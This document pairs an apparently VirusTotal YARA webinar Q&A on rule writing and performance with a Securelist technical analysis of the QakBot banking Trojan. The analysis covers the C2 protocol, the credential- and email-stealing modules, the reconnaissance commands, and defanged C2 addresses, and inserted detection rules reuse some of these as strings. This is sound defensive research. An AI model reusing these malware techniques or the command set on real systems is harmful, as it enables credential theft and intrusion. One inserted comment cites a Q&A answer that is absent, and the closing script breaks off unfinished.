Q: If a rule generates false positives on a very specific sample, would you suppress a specific hash in the rule directly or rather improve the whole logic?

Vicente here. The answer is — “it depends”. If there is a very particular binary that produces a false positive in an otherwise solid rule, we can keep the rule as long as we know what we are doing — for example we use it for hunting privately, and just exclude that specific FP file by hash. In case this rule would be used externally or automatically, for instance in a production environment for detection, then better to avoid this false positive in the logic.

Q: Some programming languages have automatic formatters (like ‘Black’ in Python, or gofmt in Golang) — do you recommend something similar for YARA, to maintain good formatting across a team?

Víctor here. As far as I know such a tool doesn’t exist. There are some alternative parsers for YARA, which are able to read a YARA source file, build an abstract syntax tree (AST) from it, and regenerate the source code from the AST. But they have limitations that make them unsuitable for building a tool like gofmt (for example the comments are completely lost).


Q: Does YARA “digest” and optimize a ruleset, for example when a user writes “i001” and “i001”?

Víctor here. YARA doesn’t perform any optimization on the condition, they are evaluated exactly as they are written. No attempt is made to detect useless branches in the condition, if you write “X or Y or Z or true” YARA evaluates X, Y and Z, it is not smart enough to realize that the condition is always true. Also, if you use the same pattern/string in different rules they are treated as if they were different, YARA doesn’t realize that you are searching for the same string.

Q: Can YARA run on only files with macOS xattributes for example com.apple.metadata:kMDItemDownloadedDate, com.apple.quarantine?

Vicente here. At the moment, I’m not aware of any module able to interact with them.

Q: I have seen that hash is case sensitive. I have to use lower case. Will this change in future?
Q: Hash looks like case sensitive. Can you confirm that?

Víctor here. The next version of YARA will include the icompare operator for case-insensitive string comparison. The == operator maintains its case-sensitive semantic when used for comparing strings, but with icompare you don’t need to worry about whether the values returned by the hash module are upper or lower case.

Q: Does YARA see filename in the file set?

Vicente here. At the moment, you cannot specify any condition about the filename in a rule, as YARA is designed just to check the content and structure of the file and the file name can easily change. Nevertheless, this option exists in case you use the VT YARA module, which is available to take advantage of file metadata for YARA rules running on VirusTotal. You can also use the -D option to define a variable in the rule that contains the filename.

Víctor here. I would like to provide more context about this. The reason for not including a “filename” keyword in a similar way to “filesize” is because “filesize” makes sense in almost any context (except when scanning a process address space) as the data being scanned always has a size. However, “filename” makes sense when you are using the YARA command-line tool for scanning your hard drive, but it doesn’t make sense where YARA is scanning the data without knowing where the data comes from. However, due to the high number of times I’ve seen this question asked, I’m considering some intermediate solution, like allowing the command line tool to define a variable that automatically takes the name of the current file.

Q: Is it possible to use YARA to monitor strings in PDF documents? Or is it medium-dependent?

Vicente here. It is possible. However keep in mind that strings are not represented inside the file the same way they are displayed to a reader. It is important to check the content of the file itself with utilities such as “strings” or with any hex editor, and select which strings can be used for a YARA rule. But it will not necessarily work if you select strings based on how they appear in the PDF when displayed.

Q: Is YARA compatible with the ELK stack?

Vicente here. There are different available options, like plugins to incorporate events matching YARA rules into Elastic, for example.


Q: Is uint16(0) faster than $magic at 0? (Where $magic is the hex value)

Vicente and Costin here. The $magic check should be considered obsolete and is hopefully not used anymore in any public rules. Please kindly use uint16(0) or the Magic module instead. This is because defining a string such as $mz = "MZ" will cause YARA to search for this short string and save all the matches in a file, no matter the offset, which greatly increases the resource overload. This slows down scanning and eats up more memory. In general, short strings should be avoided in YARA rules for this reason, or always followed by the “fullword” modifier.
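The header check above, written the obsolete way beside the recommended way, together with the guidance on the wide, nocase and fullword modifiers from the other answers. This is an added example, not from the webinar; the registry path and HTTP header strings are constructed sample values.

```yara
// Added example (not from the webinar). Shows the obsolete $magic pattern
// beside the recommended header read, and string modifiers used only where
// there is a reason for them. The sample strings are constructed values.

rule pe_magic_obsolete
{
    // Anti-pattern: YARA records every "MZ" occurrence in the file before the
    // "at 0" constraint is applied, costing time and memory on large files.
    // It compiles, but a two-byte string is a poor search atom.
    strings:
        $mz = "MZ"
    condition:
        $mz at 0
}

rule pe_magic_recommended
{
    // Reads two bytes at offset 0 and compares them with "MZ" as a
    // little-endian 16-bit value: no string search, no match list.
    // The second check follows e_lfanew at 0x3C to the "PE\0\0" signature.
    condition:
        uint16(0) == 0x5A4D
        and uint32(uint32(0x3C)) == 0x00004550
}

rule string_modifiers_with_intent
{
    // "wide" doubles the patterns searched and "nocase" multiplies them
    // further, so each modifier below is justified in a comment.
    strings:
        // Registry paths are stored as UTF-16 in many compiled binaries: wide only.
        $reg = "SOFTWARE\\Classes\\CLSID" wide
        // Seen both as ASCII and as UTF-16 across builds: search both encodings.
        $ua  = "User-Agent:" ascii wide
        // HTTP header names are case-insensitive, so nocase is warranted here.
        $enc = "Accept-Encoding" nocase ascii wide
        // Short token: fullword keeps it from matching inside longer words.
        $cmd = "cmd.exe" fullword ascii wide
    condition:
        uint16(0) == 0x5A4D and filesize < 10MB and 2 of them
}
```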

Q: In your experience, is CPU or I/O the bigger constraint? Can YARA run at low priority? Only on user idle, restricted to a time schedule? I am thinking about tunability like World Community Grid. Does YARA use sophisticated I/O scheduling?

Víctor here. That depends a lot on your rules. If you have a few high-performance rules the bottleneck will certainly be I/O, but it can change drastically if you have many rules or they are not very fast. YARA doesn’t do anything special with regards to I/O, it just uses memory-mapped files and relies on the operating system for I/O. Both in Windows and Linux, YARA tells the operating system that files are likely to be read sequentially, so that the OS can take that into account and read-ahead aggressively.

Q: Hello. Is the “nocase” option efficient? We can never know what case we can find in a malware file, and maybe the “nocase” option increases the search time and the used resources. How to determine if we need this option?

Víctor here. It depends on the string, but generally speaking “nocase” introduces a performance penalty and it should be avoided if possible. Many people use “nocase” and “wide” just in case. They are not really sure about it, but they use them because it doesn’t do any harm (or so they think). My advice is doing exactly the opposite, if you don’t have a clear reason for using those modifiers, don’t do it. If you know for sure, or have good reasons for believing that the string can appear in some arbitrary casing, use “nocase”, but avoid it if otherwise.

Q: My understanding is that the ‘filesize’ condition is evaluated AFTER all strings have been processed. If this is the case, then filesize cannot be used to make rules more efficient by eliminating samples based on filesize BEFORE strings are evaluated. Is my understanding correct? If so, do you know the reason why filesize is evaluated after strings?

Víctor here. That’s 100% correct. The reason for that behavior is that YARA is optimized for the case in which you have many rules. From the performance standpoint the best thing to do when you have a lot of rules is scanning the file in a single pass first, looking for all the strings from all the rules at once, and then evaluate all the conditions. Evaluating the conditions first, searching for each string individually as they are used in the condition does not scale well when you have thousands of rules. With a very high number of rules the odds are that you are going to need reading and scanning the file anyways, as at least one of your conditions won’t filter out the file because of its size.


Q: if you have a mature team, and a large set of rules that were developed over time — do you have any thoughts on how to go back and re-evaluate if rules are still good, or need to be updated (and how often, etc.) — or other ways to track metrics on each rule? (‘Hey, this one fired once, and it was a great find — this second one fires with every SCR, and needs some work’)

Vicente here. This is an excellent question. What would be important is to create a policy based on your needs and how you use these rules. Some of the rules can be valid for years while others can change very rapidly, and that depends both on the rule itself and on the threat they monitor. It is always good to have a baseline detection per rule (what it should be detecting) and find alternative methods to double-check that these detected samples indeed belong to the family/actor you are monitoring. From this point, you need to keep updating this triad of rules, detection methods and detected samples regularly, polishing rules as needed and replacing them once they are no longer relevant.

Q: Is there a way to centrally run YARA rules to all network workstations without depending upon other third party tools like Nessus or supported antivirus platforms?

Vicente here. There are different EDRs and utilities to do so. However this kind of practice tends to be overkill in most cases. We recommend carefully selecting what rules to run, what folders and adding further conditions to the rules in order to avoid scanning unnecessary files (you can play with conditions such as file format, size, timestamps, etc).

Q: We have tried YARA ourselves and there’s no doubt about the capabilities. What we want to understand is what is the correct way to leverage YARA? Shall we scan some workstations regularly with industry/region specific threat intelligence? Or a better approach could be to run periodic scans based on targeted hypothesis based threat hunting? Shall we only run it to investigate incidents?

Vicente here. This totally depends on your goals, as all the above are very usual use cases. In most of the cases, you want to regularly scan a small percentage of sensitive or suspicious files on a regular basis. The same with your rules, you want to maybe use the ones corresponding with active and relevant threats. In parallel, you will always have your collection active for hunting and ready for any IR/forensic if needed.

Q: Can we also search within memory with YARA?

Vicente here. It is possible. There are several EDRs and tools that allow you to do so. Also, it is always possible to use YARA against a memdump, for instance using Volatility. Last but not least, you can directly scan a running process, if you know its PID, by running “yara rule.yara PID”.

Q: Is it possible to utilize hash detection with YARA?

Vicente and Costin here. Yes, it is. You can use the “hash” external module and calculate different hashes for files or sections. Here’s an example of such a rule from GitHub XProtect.yara:
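Three ways to match on a computed hash, covering the pe.imphash() answer earlier in this Q&A and the hash module answer here. This is an added example, neither the webinar's own rule nor Apple's XProtect.yara; every hash value is a constructed placeholder to be replaced with values computed from your own samples, and both modules assume a YARA build with OpenSSL support.

```yara
import "pe"
import "hash"

// Added example. Hash values are constructed placeholders. Both modules
// return lowercase hexadecimal, so compare against lowercase literals:
// the == operator is case-sensitive, as the Q&A above notes.

rule pe_by_import_hash
{
    meta:
        description = "PE whose import table hashes to a known value (pe.imphash)"
    condition:
        uint16(0) == 0x5A4D
        and pe.imphash() == "0123456789abcdef0123456789abcdef"   // placeholder MD5
}

rule pe_by_section_hash
{
    meta:
        description = "PE whose first section's raw bytes have a known MD5"
    condition:
        uint16(0) == 0x5A4D
        and pe.number_of_sections > 0
        // Hashing one section survives changes to headers, resources and
        // overlay that would defeat a whole-file hash.
        and hash.md5(pe.sections[0].raw_data_offset,
                     pe.sections[0].raw_data_size)
            == "fedcba9876543210fedcba9876543210"                 // placeholder MD5
}

rule file_by_sha1
{
    meta:
        description = "Whole-file SHA-1 in the XProtect.yara style: exact but brittle"
    condition:
        filesize < 5MB
        and hash.sha1(0, filesize)
            == "0123456789abcdef0123456789abcdef01234567"         // placeholder SHA-1
}
```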

Q: What do you recommend for managing a large collection of YARA rules (deduping, updating versions, etc)?

Vicente here. We do not recommend any utility in particular for this, many researchers simply use GitHub. Our recommendation in terms of procedures would be always checking that rules detect what they are supposed to detect and checking against false positives, and to do this regularly. One utility you can use in this direction is YARA-CI. We also recommend having different collections for different purposes, for instance Incident Response, Forensic, Hunting, Mem-scanning, etc.

Q: How can we start using YARA for malicious email attachments?

Vicente here. There are different mail security appliances that allow you to do so. You can always check attachments separately.

Q: For memory dump, I was not able to scan directly by attaching it, rather I had to mount its file system (e.g. MemProcFS) before YARA can work. Am I correct?

Vicente here. Right. Another option is using the dedicated utility in Volatility to run YARA against memdumps.


Q: Will VT allow us to scan older parts of the corpus with retrohunt?

Vicente here. At the moment, VirusTotal Retrohunt works on a 90 day back index that can be expanded to 1 year depending on your subscription.

Q: Can YARA rules be shared with the VT community, or these only can be shared from user to user?

Vicente here. We incorporate a number of repositories from the community as crowdsourced YARA rules, you can find a list of contributors here. If you would like to contribute, please contact us!

Q: Can we find strings inside pdf files on VirusTotal with YARA rules? We can see it working on other files types but not on pdf, we didn’t really see it working and could not find something about it on the VT YARA documentation.

Vicente here. As described in a previous question, nothing changes when using VirusTotal to find a string within a PDF than when using YARA in any other environment.

Q: What are ways of hunting with YARA beyond VirusTotal?

Vicente here. Hunting is a technique/art/discipline that can be done on any platform. Basically you just need a collection of data you can explore to find what you are looking for. Usually that would mean a collection of malware with as much data on top of it as possible. In VirusTotal we work hard to make it as convenient as possible.


Q: Also consider that you can tip off the threat actor that you have found their malware…

Vicente here. This is true. Many actors are interested in understanding how they are detected, which can become quite obvious when checking YARA rules publicly available. It is a cat and mouse game, but happily the fact that actors understand how they are being detected doesn’t mean they can avoid it in an easy or quick way.

Q: Can anyone explain why YARA was created with a unique schema (yet similar) compared to SQL? Do developers see YARA rules as a catch-all rule writing standard that will eventually become a standard for querying any data? I find YARA rules far easier to write/read than many formats, and it seems more modern, but the evolution is unclear.

Víctor here. The syntax was created with legibility in mind because YARA rules are intended to be created/consumed by humans. The idea was creating a language that looked more like a programming language than like SQL, in fact you can find reminiscences of C in YARA’s syntax. However, YARA doesn’t pretend to be a general purpose query language for usages outside the scope it was designed for. Any future enhancements in the syntax will be oriented towards improving expressiveness and legibility, but always within the boundaries of its current purpose.

Q: How do you communicate the importance and utility of incorporating threat hunting techniques (like writing YARA rules) to muggles?

Vicente here. Threat Hunting is one of the best techniques we have. We use it to defend ourselves from current attacks, by expanding our visibility and establishing monitoring on threats targeting us. It is also one of the most powerful weapons we have to detect unknown threat activity.

Q: Maybe I’m jumping ahead, please forgive me if I do; but how do commercial Anti-Virus companies use YARA to determine whether a file is being malicious? How do you deal with false-positives?

Vicente here. YARA is one of the methods or engines that AV companies might use to determine whether something is malicious. In essence it is not different from other methods, and depending how it is being used can lead to False Positives. As it usually happens, this has nothing to do with the tools used but with how solid the rules are, if they are being double-checked with any second method, if there is a reputation system in place, how good the heuristics are, etc.

That’s all for now!
Stay safe everyone and hope to see you at our next webinars!

Online resources:

2 September 2021

QakBot technical analysis

Main description

QakBot, also known as QBot, QuackBot and Pinkslipbot, is a banking Trojan that has existed for over a decade. It was found in the wild in 2007 and since then it has been continually maintained and developed.

In recent years, QakBot has become one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), though it has also acquired functionality allowing it to spy on financial operations, spread itself, and install ransomware in order to maximize revenue from compromised organizations.

To this day, QakBot continues to grow in terms of functionality, with even more capabilities and new techniques such as logging keystrokes, a backdoor functionality, and techniques to evade detection. It’s worth mentioning that the latter includes virtual environment detection, regular self-updates and cryptor/packer changes. In addition, QakBot tries to protect itself from being analyzed and debugged by experts and automated tools.

Another interesting piece of functionality is the ability to steal emails. These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails.

QakBot infection chain

QakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails were delivered with Microsoft Office documents (Word, Excel) or password-protected archives with the documents attached. The documents contained macros and victims were prompted to open the attachments with claims that they contained important information (e.g., an invoice). In some cases, the emails contained links to web pages distributing malicious documents.

However, there is another infection vector that involves a malicious QakBot payload being transferred to the victim’s machine via other malware on the compromised machine.

The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It’s known that various threat actors perform reconnaissance (OSINT) of target organizations beforehand to decide which infection vector is most suitable.

QakBot infection chain

The infection chain of recent QakBot releases (2020-2021 variants) is as follows:

  • The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download a malicious document.
  • The user opens the malicious attachment/link and is tricked into clicking “Enable content”.
  • A malicious macro is executed. Some variants perform a ‘GET’ request to a URL requesting a ‘PNG’ file. However, the file is in fact a binary.
  • The loaded payload (stager) includes another binary containing encrypted resource modules. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime.
  • The ‘Stager’ loads the ‘Loader’ into the memory, which decrypts and runs the payload during runtime. The configuration settings are retrieved from another resource.
  • The payload communicates with the C2 server.
  • Additional threats such as ProLock ransomware can now be pushed to the infected machine.
Typical QakBot functions

Typical QakBot malicious activity observed in the wild includes:

  • Collecting information about the compromised host;
  • Creating scheduled tasks (privilege escalation and persistency);
  • Credentials harvesting:
    • Credential dumping (Mimikatz, exe access)*;
    • Password stealing (from browser data and cookies);
    • Targeting web banking links (web injects)*.
  • Password brute forcing;
  • Registry manipulation (persistence);
  • Creating a copy of itself;
  • Process injection to conceal the malicious process.
Communication with C2

The QakBot malware contains a list of 150 IP addresses hardcoded into the loader binary resource. Most of these addresses belong to other infected systems that are used as a proxy to forward traffic to other proxies or the real C2.

Communication with the C2 is an HTTPS POST request with Base64-encoded data. The data is encrypted with the RC4 algorithm. The static string “jHxastDcds)oMc=jvh7wdUhxcsdt2” and a random 16-byte sequence are used for encryption. The data itself is in JSON format.

Original message in JSON format

HTTPS POST request with encrypted JSON

Usually, after infection the bot sends a ‘PING’ message, ‘SYSTEM INFO’ message and ‘ASK for COMMAND’ message, and the C2 replies with ‘ACK’ and ‘COMMAND’ messages. If additional modules were pushed by the C2, the bot sends a ‘STOLEN INFO’ message containing data stolen by the modules.

  • ‘PING’ message – bot request message to C2 with ‘BOT ID’ in order to check if C2 is active:

‘PING’ message

  • ‘ACK’ message – C2 response message with field “16” containing the external IP address of the infected system, the only valuable information:

‘ACK’ message

  • ‘SYSTEM INFO’ message – bot request message to C2 with information collected about the infected system. In addition to general system information such as OS version and bitness, user name, computer name, domain, screen resolution, system time, system uptime and bot uptime, it also contains the results of the following utilities and WMI queries:
    • whoami /all
    • arp -a
    • ipconfig /all
    • net view /all
    • cmd /c set
    • nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.{DOMAIN}
    • nltest /domain_trusts /all_trusts
    • net share
    • route print
    • netstat -nao
    • net localgroup
    • qwinsta
    • WMI Query ROOT\CIMV2:Win32_BIOS
    • WMI Query ROOT\CIMV2:Win32_DiskDrive
    • WMI Query ROOT\CIMV2:Win32_PhysicalMemory
    • WMI Query ROOT\CIMV2:Win32_Product
    • WMI Query ROOT\CIMV2:Win32_PnPEntity

‘SYSTEM INFO’ message
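A detection rule built from the indicators described in this section: the static RC4 string from the C2 communication paragraph and the reconnaissance commands and WMI classes listed for the ‘SYSTEM INFO’ message. This is an added example, not a Kaspersky detection; it deliberately omits header and filesize checks because the on-disk sample is packed, so it is meant for an unpacked payload or for process memory (where filesize is undefined and memory blocks do not begin with an MZ header).

```yara
// Added example for this analysis, not a Kaspersky detection. Written for
// unpacked payloads and process memory scans (yara with a PID, or an EDR),
// hence no uint16(0) / filesize checks.

rule QakBot_unpacked_payload_indicators
{
    meta:
        description = "Unpacked QakBot payload: static RC4 traffic key plus SYSTEM INFO recon strings"
        reference   = "Securelist, QakBot technical analysis (2 September 2021)"
    strings:
        // Static string combined with a random 16-byte sequence for RC4 traffic encryption
        $rc4_static = "jHxastDcds)oMc=jvh7wdUhxcsdt2" ascii wide

        // Command lines whose output is sent in the 'SYSTEM INFO' message.
        // The nslookup string stops before the domain, which the bot fills in at runtime.
        $cmd_nslookup = "nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs." ascii wide
        $cmd_nltest   = "nltest /domain_trusts /all_trusts" ascii wide
        $cmd_whoami   = "whoami /all" ascii wide
        $cmd_netview  = "net view /all" ascii wide
        $cmd_qwinsta  = "qwinsta" fullword ascii wide

        // WMI classes queried for the same message
        $wmi_pnp  = "Win32_PnPEntity" ascii wide
        $wmi_prod = "Win32_Product" ascii wide
    condition:
        // The key string alone is specific enough. The recon strings are each
        // common in legitimate admin tooling, so require several of them together.
        $rc4_static
        or (3 of ($cmd_*) and all of ($wmi_*))
}
```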

  • ‘ASK for COMMAND’ message – bot command request message to C2. After the ‘SYSTEM INFO’ message is sent, the bot starts asking the C2 for a command to execute. One of the main fields is “14” – the SALT. This field is unique and changes in every request. It is used to protect against hijacking or takeover of a bot. After receiving this request, the C2 uses the SALT in the signing procedure and places the signature in the response, so the bot can check the signed data. Only a valid and signed command will be executed.

‘ASK for COMMAND’ message

  • ‘COMMAND’ message – C2 response message with a command to execute. The current version of the bot supports 24 commands, most of them related to download, execution, drop of additional modules and module configuration files with different options, or setup/update of configuration values.
    This type of message contains the signed value of the SALT (obtained from the bot’s request field “14”), COMMAND ID and MODULE ID. The other values of the message are not signed.
    In previous versions, the bot received modules and commands immediately after infection and sending a ‘SYSTEM INFO’ message. Now, the C2 responds with an empty command for about an hour. Only after that will the C2 send commands and modules in the response. We believe that this time delay is used to make it difficult to receive and analyze new commands and modules in an isolated controlled environment.

‘COMMAND’ C2 response with empty command

If the C2 pushes some modules, the Base64-encoded binary is placed into field “20” of the message.

‘COMMAND’ C2 response with additional module to load

  • ‘STOLEN INFO’ message – bot message to C2 with stolen information like passwords, accounts, emails, etc. Stolen information is RC4 encrypted and Base64 encoded. The key for the RC4 encryption is generated in a different way and based on the infected system ID (aka Bot ID) values, and not based on a static string as in the case of traffic encryption.

‘STOLEN INFO’ message

Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations.

The additional modules differ from sample to sample and may include: ‘Cookie grabber’, ‘Email Collector’, ‘Credentials grabber’, and ‘Proxy module’ among others.

These modules may be written by the threat actors themselves or may be borrowed from third-party repositories and adapted. It can vary from sample to sample. For example, there are older samples that may use Mimikatz for credentials dumping.

Below are some of the modules that we found during our research.

Additional modules
  • Cookie Grabber – collects cookies from popular browsers (Edge, Firefox, Chrome, Internet Explorer).

  • Hidden VNC – allows threat actors to connect to the infected machine and interact with it without the real user knowing.

  • Email Collector – tries to find Microsoft Outlook on the infected machine, then iterates over the software folders and recursively collects emails. Finally, the module exfiltrates the collected emails to the remote server.

The threat actors distributed a debug version of the email collector module at some point

  • Hooking module – hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL functions. Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies them so they jump to custom code.

The module contains a ciphered list of DLLs and functions that the bot will hook

  • Passgrabber module – collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms.

Procedure that collects passwords from different sources

  • Proxy module – tries to determine which ports are available to listen on using UPnP port forwarding and a tier 2 C2 query. Comparing current and old proxy loader versions revealed some interesting things: the threat actors decided to remove the cURL dependency from the binary and perform all HTTP communications using their own code. Besides removing cURL, they also removed OpenSSL dependencies and embedded all functions into a single executable – there are no more proxy loaders or proxy modules, it’s a single file now.

UPnP port forwarding query construction

After trying to determine whether ports are open and the machine could act as a C2 tier 2 proxy, the proxy module also starts a multithreaded SOCKS5 proxy server. The SOCKS5 protocol is encapsulated into the QakBot proxy protocol composed of: QakBot proxy command (1 byte), version (1 byte), session id (4 bytes), total packet length (dword), data (total packet length-10). Incoming and outgoing packets are stored in the buffers and may be received/transmitted one by one or in multiple packets in a single TCP data segment (streamed).

The usual proxy module execution flow is as follows:

  1. Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data.
  2. Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file.
  3. Set up external PROXY-C2 connection that was received with command 37 (update config)/module 274 (proxy) by the stager.

Communicating with the external PROXY-C2:

  1. Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started.
  2. Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2.
  3. Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10).
  4. Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol.

QakBot proxy commands are as follows:

Command   Description
1         Hello (bot->C2)
10        Set up auth credentials (C2->bot)
11        Confirm credentials setup (bot->C2)
2         Create new proxy session (C2->bot)
3         SOCKS5 AUTH (bot->C2)
4         SOCKS5 requests processing (works for both sides)
5         Close session (works for both sides)
6         Update session state/session state updated notification (works for both sides)
7         Update session state/session state updated notification (works for both sides)
8         PING (C2->bot)
9         PONG (bot->C2)
19        Save current time in registry (C2->bot)

Parsed packets from C2

Tracking single proxy

  • Web inject – the configuration file for the hooking module
    Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim’s traffic by injecting the module into the browser’s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page.

Fragment of JavaScript injected into the source page of the Wells Fargo login page

QakBot statistics

We analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% compared to the previous year and reached 17,316.

Number of users affected by QakBot attacks from January to July in 2020 and 2021 (download)

We observed the largest campaigns in Q1 2021 when 12,704 users encountered QakBot, with 8,068 Kaspersky users being targeted in January and 4,007 in February.


QakBot is a known Trojan-Banker whose techniques vary from binary to binary (older and newer versions). It has been active for over a decade and does not look like it is going away anytime soon. The malware continuously receives updates, and the threat actors keep adding new capabilities and updating its modules in order to steal information and maximize revenue.

We know that threat actors change how they perform their malicious activities based on security vendor activities, using sophisticated techniques to stay under the radar. Although QakBot uses different techniques to avoid detection, for example, process enumeration in order to find running anti-malware solutions, our products are able to detect the threat using behavior analysis. The verdicts usually assigned to this malware:


Indicators of compromise (C2 server addresses)

75.67.192[.]125:443 24.179.77[.]236:443 70.163.161[.]79:443 72.240.200[.]181:2222 184.185.103[.]157:443 78.63.226[.]32:443 83.196.56[.]65:2222 95.77.223[.]148:443 76.168.147[.]166:993 105.198.236[.]99:443 73.151.236[.]31:443 64.121.114[.]87:443 213.122.113[.]120:443 97.69.160[.]4:2222 77.27.207[.]217:995 105.198.236[.]101:443 75.188.35[.]168:443 31.4.242[.]233:995 144.139.47[.]206:443 173.21.10[.]71:2222 125.62.192[.]220:443 83.110.109[.]155:2222 76.25.142[.]196:443 195.12.154[.]8:443 186.144.33[.]73:443 67.165.206[.]193:993 96.21.251[.]127:2222 149.28.98[.]196:2222 222.153.122[.]173:995 71.199.192[.]62:443 45.77.117[.]108:2222 45.46.53[.]140:2222 70.168.130[.]172:995 45.32.211[.]207:995 71.74.12[.]34:443 82.12.157[.]95:995 149.28.98[.]196:995 50.29.166[.]232:995 209.210.187[.]52:995 149.28.99[.]97:443 109.12.111[.]14:443 209.210.187[.]52:443 207.246.77[.]75:8443 68.186.192[.]69:443 67.6.12[.]4:443 149.28.99[.]97:2222 188.27.179[.]172:443 189.222.59[.]177:443 149.28.101[.]90:443 98.192.185[.]86:443 174.104.22[.]30:443 149.28.99[.]97:995 189.210.115[.]207:443 142.117.191[.]18:2222 149.28.101[.]90:8443 68.204.7[.]158:443 189.146.183[.]105:443 92.59.35[.]196:2222 75.137.47[.]174:443 213.60.147[.]140:443 45.63.107[.]192:995 24.229.150[.]54:995 196.221.207[.]137:995 45.63.107[.]192:443 86.220.60[.]247:2222 108.46.145[.]30:443 45.32.211[.]207:8443 193.248.221[.]184:2222 187.250.238[.]164:995 197.45.110[.]165:995 151.205.102[.]42:443 2.7.116[.]188:2222 45.32.211[.]207:2222 71.41.184[.]10:3389 195.43.173[.]70:443 96.253.46[.]210:443 24.55.112[.]61:443 106.250.150[.]98:443 172.78.59[.]180:443 24.139.72[.]117:443 45.67.231[.]247:443 90.65.234[.]26:2222 72.252.201[.]69:443 83.110.103[.]152:443 47.22.148[.]6:443 175.143.92[.]16:443 83.110.9[.]71:2222 149.28.101[.]90:995 100.2.20[.]137:443 78.97.207[.]104:443 207.246.77[.]75:2222 46.149.81[.]250:443 59.90.246[.]200:443 144.202.38[.]185:995 207.246.116[.]237:8443 80.227.5[.]69:443
45.77.115[.]208:995 207.246.116[.]237:995 125.63.101[.]62:443 149.28.101[.]90:2222 207.246.116[.]237:443 86.236.77[.]68:2222 45.32.211[.]207:443 207.246.116[.]237:2222 109.106.69[.]138:2222 149.28.98[.]196:443 45.63.107[.]192:2222 84.72.35[.]226:443 45.77.117[.]108:443 71.163.222[.]223:443 217.133.54[.]140:32100 144.202.38[.]185:2222 98.252.118[.]134:443 197.161.154[.]132:443 45.77.115[.]208:8443 96.37.113[.]36:993 89.137.211[.]239:995 45.77.115[.]208:443 27.223.92[.]142:995 74.222.204[.]82:995 207.246.77[.]75:995 24.152.219[.]253:995 122.148.156[.]131:995 45.77.117[.]108:8443 24.95.61[.]62:443 156.223.110[.]23:443 45.77.117[.]108:995 96.61.23[.]88:995 144.139.166[.]18:443 45.77.115[.]208:2222 92.96.3[.]180:2078 202.185.166[.]181:443 144.202.38[.]185:443 71.187.170[.]235:443 76.94.200[.]148:995 207.246.77[.]75:443 50.244.112[.]106:443 71.63.120[.]101:443 140.82.49[.]12:443 24.122.166[.]173:443 196.151.252[.]84:443 81.214.126[.]173:2222 73.25.124[.]140:2222 202.188.138[.]162:443 216.201.162[.]158:443 47.196.213[.]73:443 74.68.144[.]202:443 136.232.34[.]70:443 186.154.175[.]13:443 69.58.147[.]82:2078
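The addresses above are defanged with "[.]" and several hosts appear more than once with different ports. As an added example that is not part of the article, the following Python normalizes such a list before it goes into a blocklist or detection rule: it refangs each entry, validates the address and port, drops exact duplicates, and reports which ports each host was seen on. The sample input takes a few entries from the list above, repeats one of them, and adds one deliberately malformed entry (constructed) to exercise the validation path.

```python
"""Normalize defanged C2 indicators of the form "a.b.c[.]d:port".

Added example; the sample below mixes entries from the list above with a
constructed invalid address to show that bad input is reported, not silently kept.
"""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict

# Entries copied from the IoC list above, one repeated on purpose, plus a
# constructed malformed address (999.x) that must be rejected.
SAMPLE_IOCS = """
75.67.192[.]125:443 24.179.77[.]236:443 72.240.200[.]181:2222
149.28.98[.]196:2222 149.28.98[.]196:995 149.28.98[.]196:443
71.41.184[.]10:3389 217.133.54[.]140:32100 75.67.192[.]125:443
999.1.1[.]1:443
"""

TOKEN_RE = re.compile(r"^(?P<host>[0-9.\[\]]+):(?P<port>\d{1,5})$")


def refang(token: str) -> str:
    """Turn the sharing-safe "[.]" notation back into a real dotted quad."""
    return token.replace("[.]", ".")


def defang(ip: str) -> str:
    """Inverse of refang, for re-publishing indicators without live links."""
    return ip.replace(".", "[.]")


def parse_iocs(text: str) -> tuple[list[tuple[str, int]], list[str]]:
    """Return (sorted unique (ip, port) pairs, rejected tokens)."""
    good: set[tuple[str, int]] = set()
    bad: list[str] = []
    for tok in text.split():
        m = TOKEN_RE.match(tok)
        if not m:
            bad.append(tok)
            continue
        try:
            ip = ipaddress.ip_address(refang(m["host"]))  # rejects octets > 255
        except ValueError:
            bad.append(tok)
            continue
        port = int(m["port"])
        if not 0 < port < 65536:
            bad.append(tok)
            continue
        good.add((str(ip), port))
    return sorted(good), bad


def group_by_port(entries: list[tuple[str, int]]) -> dict[int, list[str]]:
    """Port -> hosts, in the order the (already sorted) entries arrive."""
    groups: dict[int, list[str]] = defaultdict(list)
    for ip, port in entries:
        groups[port].append(ip)
    return dict(groups)


def ports_by_host(entries: list[tuple[str, int]]) -> dict[str, list[int]]:
    """Host -> sorted list of ports it was seen on."""
    hosts: dict[str, set[int]] = defaultdict(set)
    for ip, port in entries:
        hosts[ip].add(port)
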